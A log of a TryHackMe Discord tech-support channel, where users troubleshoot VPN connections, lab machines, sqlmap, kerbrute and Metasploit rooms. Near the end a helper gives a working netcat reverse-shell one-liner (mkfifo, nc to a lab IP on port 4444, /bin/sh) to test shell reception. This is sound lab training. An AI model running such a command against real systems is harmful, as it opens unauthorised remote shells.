ahhh I see, best of luck with your experiments
Oh wait how about you just proxy to a blocked country
Not sure if there are any, but that is possible
hi I am connected to the VPN using OpenVPN but cannot connect to a box using ssh
I'm at Linux fundamentals part 2 task 2
never mind it works after rebooting the box
my gf discord account got hacked and changed all of her email and number things so was just wondering if you haxers can get it back yknow
Contact Discord support
make sense
Is support@tryhackme.com inactive?
I sent an email 3 weeks ago. However, I did not get a return.
Try a again
Hey, Im on Manjaro linux and im trying to build a driver but make is failing with an error about /lib/modules/5.2.18-g1fef36f5a/build: No such file or directory. Stop.
Makefile:389: LINUX} Error 2
this channel is for THM related tech support, maybe ask in #infosec-general
oh, sorry, ok
hello
i am having an issue with the buffer overflow prep path
everytime i connect on rdp to the machine
it gets disconnected
i have to re launch the connection a couple of times
for it to wor
sometimes it does not work
any idea what is causing the issue
internet connection is pretty good
!
thank you in advance for your help
i am connecting from my kali machine
last error message -> timeout waiting for activation
is this the right place to ask about the THM subscription?
oh nvm, already found it 😅
You mean how to verify your thm profile in discord ?
Bro I gave verified my account
Okay, so I guess you are fine now ?
Yes 🥰
I just signed up, I am having trouble starting the machine, when I copy the ip address in to FireFox I get a error code
Which room, which task, are you on your own machine or you using the attackbox ?
And you try to open the IP from the "active machine information" box ?
Yes, Im using the IP in the top right corner of the active machine
Well it's a difference if you use the IP which is in the top right corner in a green box or the IP that's in the "Active Machine Information" box. One IP is the attackbox IP and the other one is the target machines IP. So make sure you are using the correct one. In task 1 you can see how the "Active Machine Information" box is looking like
the IP addess in the green box and the active machine IP are the same
Uhm, I somewhat doubt that
So maybe provide a screenshot of that pls. You would have to verify first in order to send screenshots
!docs verify
But just so you know, the IP in the active machine information box is the one you try to access. If you access it from the web based attackbox you should be able to just enter it in your attackbox browser. If you try to open that IP from your own local machine you have to be connected to the thm vpn with openvpn
i can not locate the bot
I think I have discovered the problem but I don't know how to make it right
@sharp bison <-- The bot
The course I'm following suggests I change the network connection of my vm Attached to: Bridged adapter from the default Attached to: NAT. Upon selecting the brigded adapter option, I think i chose the wrrong adapter for the connection but I don't know which is right either.
Yup, I didn't respond to your email because there was a lot of drama surrounding the AoC3 event. Furthermore, I will not be responding to your most recent email as the event is over and it only looks like you are trying to stir up more drama:)
I'm using NAT in these settings and I never encountered any issues. So maybe try that as well
Have i verified myself?
Doesn't look like you did, maybe wait 2 - 3 mins. But here is the link to the guide on how to verify again: https://help.tryhackme.com/community/discord
@bronze vale Actually not, im just curious about the algorithm you mentioned.
I mean, I'm not interested in awards or anything else. I am wondering the security part. Maybe there is something that could be improved.
I appreciate your interest but the algorithm is not going to be improved/ changed/ updated:)
@bronze vale Understood. Sorry for the part you understand as drama. Thank you for your interest.
Gave +1 Rep to @bronze vale
I apparently have 3 VM's running. However, i don't see them in the web interface. How can i connect to those machines? Or close them?
Either go to the rooms you have previously started these machines and terminate them or use that: #site-support message
Works. Thanks!
Hi I am currently university student and own a university email. But I wanna use my personal email for tryhackme account. Can I change email to university one and buy the subscription so I get discount after that change back to personal one?
Did the copy and paste option from the attach box go away? I do not see it any longer.
I am able to copy paste plain text, but for zip , rar and encrypted file i didn't manage to use the clipboard
You can copy and paste into and out of the attack box?
my location flag is wrong on my profile- how might I update that...?
Thank you, greatly
Gave +1 Rep to @upbeat bloom
Hello how can i change my country back to Original. I tried it many times but no work. If you could help me, suggest me please.
Thanks bro
LOL, that's a lot of adapters.
It needs to be attached-to (routed via) the NIC you use to access the Internet, as it will need a path to tryhackme. Or at least, that would be the simplest way to configure.
Good afternoon
Hey in my THM "About Me" section, it incorrectly says I am from Afghanistan when I am actually from the US. I've tried manually changing it to the US multiple times but upon refresh it continues to say I am from Afghanistan, why is this?
This should resolve it 🙂
#site-support message
Hey I am having some trouble with a specific machine on CC: Pen Testing.
ITs for the SQLMap section.
I've tried a load of things but eventually resorted to walkthroughs but im still not getting the flag.
All i am getting is this
Database: tests
Table: msg
[2 entries]
+---------+---------+
| m | v |
+---------+---------+
| <blank> | <blank> |
| <blank> | <blank> |
+---------+---------+
Database: tests
Table: lol
[1 entry]
+---------+---------+
| f | v |
+---------+---------+
| <blank> | <blank> |
+---------+---------+
I can share the SQLMap commands I have used if needed
whats the command you're using?
I am having trouble getting OpenVPN to work. I checked that it is downloaded
Your SQLmap is broken, try updating it or installing the one from the official GitHub page:)
What OS are you on?
Not all have a default install of OpenVPN, and so need that in addition to the config file. So specifics of what "trouble" is are helpful. (Error messages, screenshots etc.)
Hi, Im a new thm member and doing jr pentest room. im having some problem in the metasploit room. im using my local vmware kali linux to exploit eternal blue. but im facing error, attached pic. what is the problem. i connected vpn as shown in the picture. my vmware network setting is NAT. Thank you so much for your response.
Note: if i use attackbox, the exploit run sucessfully.
How do you stop an active machine
wanted to ask what are NFTs (plz explain me i am dumb)
i think they are related to crypto?
plz ping me if u answer
this channel isn't the best place to ask that.
ah then where should i ask?
and sorry
maybe try #infosec-general
k
What can you do to me with my ip address?
Hello, I have a problem getting ssh into the machine. I'm connected to network using OpenVPN, I can ping machine, but ssh connection is refused, nothing show up when enter the command.
Hello everyone I’m new to this site and hope familiarize it 💻
same happened many times with me. tried after sometime it works
or try connecting again with openvpn/ start attack machine again
I'm trying from 5 hours man. Even restart my attack machine and terminate victim machine. It is still same
Hey. I'm working on wreath network (on vip subscirption) but after my network's time expired, I've been kicked off. Then, after starting network again, I can't even ping the initial host
10.200.195.200
I also tried from attack-box, but it's the same
any way round this?
you using the right vpn file?
does your ip of tun0 start with 10.50?
yes, I'm receiving responses from vpn's gateway 10.50.192.1
I haven't done the room, just reading over the page, it does say the attack box won't workt
this host is just unresposnive. It's the second time I have this ;/
ok, doesn't matter though
should work over vpn with dedicated file
but it doesn't
suddenly :/
I voted for reset, but still need 3 votes more
and in your diagram, the ip it is showing you is 10.50.195.200? I'm guessing there are multiple wreaths, I get 10.50.186.200... I wonder if you regenerate your wreath file if you'll get a different 'room'
just did it (regenerate) and it's the same subnet
my diagram shows initial machine ip is 10.200.195.200
my attackbox is a linux one
my ip on tun0 is 10.50.192.14 and gateway is 10.50.192.1
and if you go to this page, does it show all green checkmarks on the left? https://tryhackme.com/access?type=networks
yes
yeah I think it just needs a reset
When I was doing wreath I had the same issue once, when the time run out and starting the network showed the .200 host down even after giving it time, waited the next sleep and it started working
Do I really need for someone at the same subnet to vote? :<
If it needs the reset you need the votes
yeah and I asked, not sure if there is a way we can reset it for you
Hi, can someone help me out?
I've got IoT Devices in an APN-network which is filtered by a whitelist. Since I can only whitelist ip-address ranges, I wonder if a device would be able to access a url when I whitelist the ip which the url maps to as well as the ip-address of a dns-server? Does someone know?
@upbeat bloom - btw, if I leave the room (in order to join it again in a minute), will my progress be reset?
Anyone know how to solve this issue? I've tried on attack box and it still does nothing. Its for Attacking Kerberos challenge
@upper plover show the command
I'm not sure
||./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt||
try to specify ip address (kerbrute has an option for this)
ok
doesn't show anything either
could you please show a few lines of your User.txt file?
it looks a bit too large to me
it should has only 100 lines
OKAY
🙂
i know why
yeah it works but you used wrong link
you have to get a "raw" file
using the link provided in room it will download the whole github page
not just only userlist
that's why you have "raw" option for a file on github
I tried to download the txt
using wget
thought it would work by downloading the txt file
but turns out it did nothing
yeah thank god xd
hello, i am using a windows 10 pc . I downloaded the configuration file for the open vpn, when i try to connect with THM , it does not connect, the vpn is running, but not connected with server
can anybody help me ?
what did I ask you to post?
sorry, i am giving some screenshot. that mght help
what have you tried and what's breaking?
I strongly recommend using a VM, also take a look at this room: https://tryhackme.com/room/openvpn
the site is often wrong on the connection status
try connecting to 10.10.10.10
also check this out #site-support message
So you are good I guess, right ?
As Hydra said, the access page status is not reliable to verify if you are successfully connected. To verify if you are succesfully connected you either browse to 10.10.10.10 in the machine you are connected to the vpn or enter curl 10.10.10.10/whoami which should then reply with your tun0 IP. So just ignore the access page pls. 🙂
And just one last thing. Make sure you are not connected to the thm vpn on your windows host and inside your VM simultaneously. So if you are using your VM, then only be connected to the vpn directly inside that VM and not on your host machine as well.
okay
In the Introductory researching room, How Can i get the machine access if the website dont show if I am connected or not? How to open the machine?
previously this came.
That room doesn't require or even has a target machine. So therefore nothing to connect to
okay
Hello, I have problem connecting to the splunk instance in the Splunk 2 room
I am trying to connect to it for the past hour...
Rebooted it a couple of times
I have not done that room, how are you supposed to connect to that room ?
"Deployed the virtual machine and connected to the website found at 10.10.94.215:8000 "
And when you browser there, what's the error you get ?
no, it just loads
Is that the current target machine IP that is running? If yes, can I try to connect to it?
Okay, seems to load for me, but it's not just accidentally having burp with intercept enabled started, right?
no
Are you on the attackbox or your own machine ?
Ah, no it's also still loading. But at least a page appeared.
This is as far as it loads
weird
As I said, I have no idea about that room, should there be more then what is in my screen ?
Okay, well then I guess you might have to go with the OVA file mentioned in the task :/
sure, no problem
but do i have to tell someone to check the thm machine
there seems to be a problem on their end
I mean you could report it in #room-bugs . But as they already mentioned the OVA file in case the VM doesn't load, I guess that behaviour for that machine is somewhat that can happen and I'm not sure if they can/will fix that.
sorry for the question, but are you looking the splunk 2 room
No, this one: https://tryhackme.com/room/bpsplunk ?
this is the problematic room
Oh okay. Well ye then I guess you might report it, as I don't see anything mentioned about some form of issues there.
Hey, after letting the target machine started and doing something else I just tried it right now and it seems to work. So maybe that machine just takes quite long to be fully booted and ready to use.
So I suggest you start the target machine for splunk, let it sit there for half an hour while doing something else and then come back to it again
I'm going to give it a try again, however, i waited for more than 30 minutes the first time
Well maybe there is an additional issue with your attacking machine, so maybe try if you can access my target machine: http://10.10.12.165:8000
Still the same
Try to refresh it 1 or 2 times. If that doesn't solve it, check ip a s to make sure you only have a tun0 interface and not any extra like tun1, tun2 etc.
Could you try to refresh the page with ctrl + f5
maybe it was cached
I am not having issues with other rooms
I have only tun0
already checked it
Still works with ctrl + F5
So maybe try sudo ip link set dev tun0 mtu 1200 and then refresh again
Ah ok, then that last command might be not necessary
Hello im looking for a senior level Discord Security Manager for a 100k+ discord server.
@upbeat bloom
Guess that's nothing to be searched here.
Fontaena thank you for your response. would you perhaps know a place where i can find someone?
Gave +1 Rep to @crystal marlin
Not sure, so wait until a mod replies to you.
Still no luck with the room... I have to wait extremely long for a basic search 🥲
Well, more then that I guess I can't help you 😄
thanks anyways❤️
The last option would be to test if using the attackbox would be faster
Will do that, but I don't believe this is the issue
I have reported the issue to the room-bugs
Ye, probably not, but worth a try 🙂
Hello everybody, like @lapis glacier already reported, I'm getting a lot of disconnects when using the VPN .. both from Mac and Linux
Hi, I have a problem, when I try to download the OpenVPN configuration it shows a 404 error, is there a solution? :)
Try to regenerate it
If that doesn't work. Try regenerating your config with a different server
@naive dust
it works , thank you very much :)
Gave +1 Rep to @glad egret
Happy to help!
Hi guys, idk if thats the right channel, what's the utility of teams? like they help to connect people or are like competitive things?
I'm not able to connect to vpn
After following steps it's still not showing connected tho on terminal it is
Can you open 10.10.10.10 in your machines browser where you connected to the thm vpn ?
Is the certificate for AOC 3 still avaible or not?
I believe so
wireshark doesn't seem to want to capture anything for me
I have "Random packet generator: rankpkt" and "UDP Listener remote capture: udpdump" on the Welcome screen, and neither of their graphs are moving
I did get my two free months. I paid for the year but new in 12 months not 14
I’m sorry i did not get two free months
Linux shell practice task 14, im unable to ssh into the machine. I tried restarting the machine but still not working. Am i doin some thing wrong?
room link? @livid cradle
Hi everyone, I have a problem here I can't connect to the wifi on my kali linux on USB, it's says "No network devices available", please help
Refer to #infosec-general
The Live USB boot doesn't setup drivers for your WiFi NIC because it doesn't have any (in the .iso or similar disk image) and you don't get any network interface to use to connect to a network
@daring palm you want to go to that page someone else linked you to, https://tryhackme.com/room/openvpn, and follow the instructions to download the VPN configuration file
Are you running kali linux?
if not, you just open up another terminal and run sudo openvpn path/to/config/file
If you're using Kali they have a handy VPN tool which I can help you configure, in which case you literally just click on the VPN you want and it works without needing to run the command above
they are all set up now
Awesome 😄
I was at 17 but as soon as I clicked on a new room now I am at 0 . I don't understand why it reset my rank .
Well maybe you just haven't refreshed the page for a while and your streak has been reset earlier already.
Yes I can
But on access page no green tick is there in front of connected
Anyone??
The access page is not reliable to check if you are successfully connected. To do that in a reliable way is either trying to open 10.10.10.10 in your machines browser or entering curl 10.10.10.10/whoami in your machines terminal (whereas the latter replies with your tun0 IP if connected to the thm vpn)
And is machine ip different?
Different to what? But ye, in case you have the attackbox opened while also being connected to the thm vpn with your local machine you could have different IPs. So always check your tun0 IP on your local machine.
Well I'm not sure about which machine IP you are talking? The target machine? Best to provide a screenshot so I know what IP you are talking about
Got it
Thanks
Hi I am in the Linux Fundamentals Part 1 and all the terminals run as root... Is there something wrong I should be able to start as tryhackme user?
yes thank you
ok
Disregard looks like it worked
.
.
hi @idle kite
yes your machine's VPN IP and the target machine's IPs are different.
Greetings, I tried to install maven apt install maven but I got this Error :
this channel is for tech support related to THM, I'd ask in #general or #infosec-general
My apologize , 😅 following https://tryhackme.com/room/solar | Instruction
maybe try #919976471924183141 or #room-help then to see if anyone else had similar issues, I'd double check your sources.list file though
Would THM mind if I make a script/app which would "automatize" pwning of the room? Not a brute-forcer, think of it as a automatic test for the happy-path. Could be issue if people start to use this as a quick solution to move their ranks.
Also, are you planning to change how the "top xx% is calcualted? Probably removing unused/inactive accounts from the stats.
netcat -e isnt an option anymore?
as long as the author has okayed writeups, I'd imagine it's probably okay to write autopwn scripts
focusing on ranks is a very bad idea imo - thm is about learning and the journey, doing it to climb through the ranks is, well, eh...
Contact support
Certain "flavours" of netcat still support -e
Has anyone managed to get a reverse shell working with Kali in WSL?
@turbid vessel So when you enter ip a s in your terminal, do you only see a tun0 interface or any extra like tun1, tun2 etc. ?
No only tun0
If you enter sudo ufw status what's the reply you get?
Well it's not installed in my machine
I just installed it and it's inactive
My vm is runing in a virtualbox which is in a windows host
There is no need to install it, unless you want to, so make sure it's inactive to not run into any issues.
I would try to restart the target machine and make sure your LHOST matches your tun0 IP by checking ip a s. Also you might want to try capturing a more simple rev shell by spinning up one of the linux fundamental room target machines and try if you are able to receive rev shells at all.
Give the target machine in the room you are actually in a good couple of minutes to make sure it's fully booted.
Can you suggest me a room to test
Ye as I said, use the linux fundamental 2 room for example. Ssh into the target machine and try a simple rev shell to catch with netcat on your attacking machine. So for example try to use that payload on the target machine mkfifo /tmp/yqtjmmv; nc 10.10.24.173 4444 0</tmp/yqtjmmv | /bin/sh >/tmp/yqtjmmv 2>&1; rm /tmp/yqtjmmv
I don't know if that means something but when i tried in other challenge nc -lvpn port, i receive a connection
Just replace the IP and port on that line with your tun0 IP and the port you are listening on
Okay, well then you most probably able to catch rev shells. I would still make sure. Did you restart the target machine already and try again ?
Yes
And the same issue no response
Well then maybe verify your thm profile in discord to be able to send screenshots and show a screenshot of your options in msfconsole. show options
!docs verify
Which room and task exactly is this ?
rpmetasploit task 5
Could you send me your tun0 IP via DM and start a nc listener in a new terminal with nc -lnvp 4848 ?
Alrighty
i start an attackbox and i lunch a converation between my local machine and attackbox and it works
but reverse the challenge no
you should have switched to a different exploit by now, you're done withexploit/windows/http/icecast_header and you should be on the next step that's exploit/multi/handler
EDIT: NVM i didnt read ahead.
Is anyone using a kali setup via VPN instead of the in browser launch?
me
Have you upgraded to 2020.3 yet?
no
Yeah, I pulled the trigger too soon before reading forth, my bad.
Maybe it won't matter but I'm trying to get a set up going using kali on windows but can not for the life of me get network manager running and enabled so I can create and use a VPN connection.
also i already do this but using the attack box
do you use a nat connection ? ( vb or vmware? )
Have you tried using a different payload, for example windows/shell_reverse_tcp already ?
yes i already try it ?
Is this a question? I'm confused 🤔
no lol
No. I have kali loaded and running beside windows in seamless mode using kex gui.
i already try it
What else you could try is setting sudo ip link set dev tun0 mtu 1200 and then try the exploit again.
Keep in mind, if you run that exploit a few times, the target machine might be messed up.
